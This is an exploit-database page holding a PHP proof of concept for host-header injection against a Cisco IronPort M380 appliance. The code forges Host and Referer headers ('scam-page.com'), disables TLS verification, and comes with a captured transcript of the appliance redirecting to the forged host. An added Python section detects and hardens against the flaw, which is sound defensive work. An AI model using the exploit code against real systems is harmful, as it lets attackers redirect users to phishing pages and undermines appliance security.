Cisco Content Security Virtual Appliance M380 IronPort Remote Cross Site Host Modification

2019.09.10
Credit: Todor Donev
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

<?php
//
// Cisco Content Security Virtual Appliance M380 IronPort Remote Cross Site Host Modification Demo Exploit
//
//
// Copyright 2019 (c) Todor Donev <todor.donev at gmail.com>
//
//
// Disclaimer:
// This or previous programs are for Educational purpose ONLY. Do not use it without permission.
// The usual disclaimer applies, especially the fact that Todor Donev is not liable for any damages
// caused by direct or indirect use of the information or functionality provided by these programs.
// The author or any Internet provider bears NO responsibility for content or misuse of these programs
// or any derivatives thereof. By using these programs you accept the fact that any damage (dataloss,
// system crash, system compromise, etc.) caused by the use of these programs are not Todor Donev's
// responsibility.
//
// Use them at your own risk!
//
//
// [test@localhost ironport]$ php -S localhost:1337 ironport_m380.php
// PHP <HIDDEN> Development Server started at Sun Sep 8 16:47:43 2019
// Listening on http://localhost:1337
// Document root is /home/test/ironport
// Press Ctrl-C to quit.
// * About to connect() to 192.168.1.1 port 443 (#0)
// * Trying 192.168.1.1... * connected
// * Connected to 192.168.1.1 (192.168.1.1) port 443 (#0)
// * Initializing NSS with certpath: sql:/etc/pki/nssdb
// * skipping SSL peer certificate verification
// * SSL connection using TLS_DHE_RSA_WITH_AES_128_GCM_SHA256
// * Server certificate:
// * subject:
// * start date: Mar 19 00:00:00 2018 GMT
// * expire date: Mar 18 23:59:59 2020 GMT
// * common name:
// * issuer:
// > GET / HTTP/1.1
// Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
// Cache-Control: no-cache
// Content-Type: application/x-www-form-urlencoded; charset=utf-8
// Host: scam-page.com
// Referer: scam-page.com
// User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0
//
// * HTTP 1.0, assume close after body
// < HTTP/1.0 303 Redirecting
// < Server: glass/1.0 Python/2.6.4
// < Date: Sun, 08 Sep 2019 13:47:59 GMT
// < Content-Type: text/html
// < X-Frame-Options: SAMEORIGIN
// < Set-Cookie: sid=InCkP0xGNg7fyAqL2mAO; expires=Tuesday, 10-Sep-2019 13:47:59 GMT; httponly; Path=/; secure
// < Cache-Control: no-store,no-cache,must-revalidate,max-age=0,post-check=0,pre-check=0
// < Pragma: no-cache
// < Expires: Sun, 08 Sep 2019 13:47:59 GMT
// < Last-Modified: Sun, 08 Sep 2019 13:47:59 GMT
// < Location: https://scam-page.com/login?CSRFKey=c17fd622-f031-f0e0-2cab-2854acb4a443&referrer=https%3A%2F%2Fscam-page.com%2FSearch
// <
// * Closing connection #0
// * About to connect() to 192.168.1.1 port 443 (#0)
// * Trying 192.168.1.1... * connected
// * Connected to 192.168.1.1 (192.168.1.1) port 443 (#0)
// * skipping SSL peer certificate verification
// * SSL connection using TLS_DHE_RSA_WITH_AES_128_GCM_SHA256
// * Server certificate:
// * subject:
// * start date: Mar 19 00:00:00 2018 GMT
// * expire date: Mar 18 23:59:59 2020 GMT
// * common name:
// * issuer:
// > GET / HTTP/1.1
// Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
// Cache-Control: no-cache
// Content-Type: application/x-www-form-urlencoded; charset=utf-8
// Host: scam-page.com
// Referer: scam-page.com
// User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0
//
// * HTTP 1.0, assume close after body
// < HTTP/1.0 303 Redirecting
// < Server: glass/1.0 Python/2.6.4
// < Date: Sun, 08 Sep 2019 13:48:00 GMT
// < Content-Type: text/html
// < X-Frame-Options: SAMEORIGIN
// < Set-Cookie: sid=NPPfo6uXJ5gPbJSPcNDE; expires=Tuesday, 10-Sep-2019 13:48:00 GMT; httponly; Path=/; secure
// < Cache-Control: no-store,no-cache,must-revalidate,max-age=0,post-check=0,pre-check=0
// < Pragma: no-cache
// < Expires: Sun, 08 Sep 2019 13:48:00 GMT
// < Last-Modified: Sun, 08 Sep 2019 13:48:00 GMT
// < Location: https://scam-page.com/login?CSRFKey=32b0b069-34bb-1fdf-9f92-2de72a24cb65&referrer=https%3A%2F%2Fscam-page.com%2FSearch
// <
// * Closing connection #0
//

$url = "https://192.168.1.1";
$fake_host = "scam-page.com";

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($ch, CURLOPT_VERBOSE, true);

$headers = [
    'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
    'Cache-Control: public',
    'Content-Type: application/x-www-form-urlencoded; charset=utf-8',
    'Host: '.$fake_host,
    'Referer: '.$fake_host,
    'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0',
];
curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);

$output = curl_exec($ch);
curl_close($ch);
echo $output;
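
A defender-side check for the behaviour in the transcript above, added here as an example (it is not part of the original exploit and not Cisco's code): it flags a redirect whose host, or whose embedded `referrer` URL, falls outside an allowlist, and shows a redirect builder that never copies an unrecognised `Host` header into the URL. The allowlist contents, the function names and the canonical host are assumptions; the sample `Location` value is the one from the first response in the transcript.

```python
from urllib.parse import urlsplit, parse_qsl

# Assumption: names the appliance is legitimately reached under.
ALLOWED_HOSTS = {"192.168.1.1"}

def host_of(header_value):
    """Hostname from a Host header value ("name", "name:port", "[v6]:port")."""
    try:
        return (urlsplit("//" + header_value.strip()).hostname or "").lower()
    except ValueError:
        return ""

def redirect_hosts(location):
    """(where, host) for the redirect target and for any absolute URL
    carried in its query string, such as referrer=https%3A%2F%2F..."""
    parts = urlsplit(location)
    found = [("Location", parts.hostname.lower())] if parts.hostname else []
    for key, value in parse_qsl(parts.query):
        inner = urlsplit(value)
        if inner.scheme in ("http", "https") and inner.hostname:
            found.append(("Location?" + key, inner.hostname.lower()))
    return found

def audit_redirect(request_host, location, allowed=ALLOWED_HOSTS):
    """Findings for redirect hosts outside the allowlist; each is marked
    when it simply echoes the request's Host header."""
    sent = host_of(request_host)
    return [(where, host, "echoes Host header" if host == sent else "off allowlist")
            for where, host in redirect_hosts(location) if host not in allowed]

def login_redirect(request_host, canonical="192.168.1.1", allowed=ALLOWED_HOSTS):
    """Hardened redirect builder: an unrecognised Host never reaches the URL."""
    host = host_of(request_host)
    return "https://%s/login" % (host if host in allowed else canonical)

# Location value from the first response in the page's transcript.
SAMPLE_LOCATION = ("https://scam-page.com/login?CSRFKey=c17fd622-f031-f0e0-2cab-2854acb4a443"
                   "&referrer=https%3A%2F%2Fscam-page.com%2FSearch")

if __name__ == "__main__":
    for finding in audit_redirect("scam-page.com", SAMPLE_LOCATION):
        print(finding)
    print(login_redirect("scam-page.com"))
```
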


Copyright 2019, cxsecurity.com

 
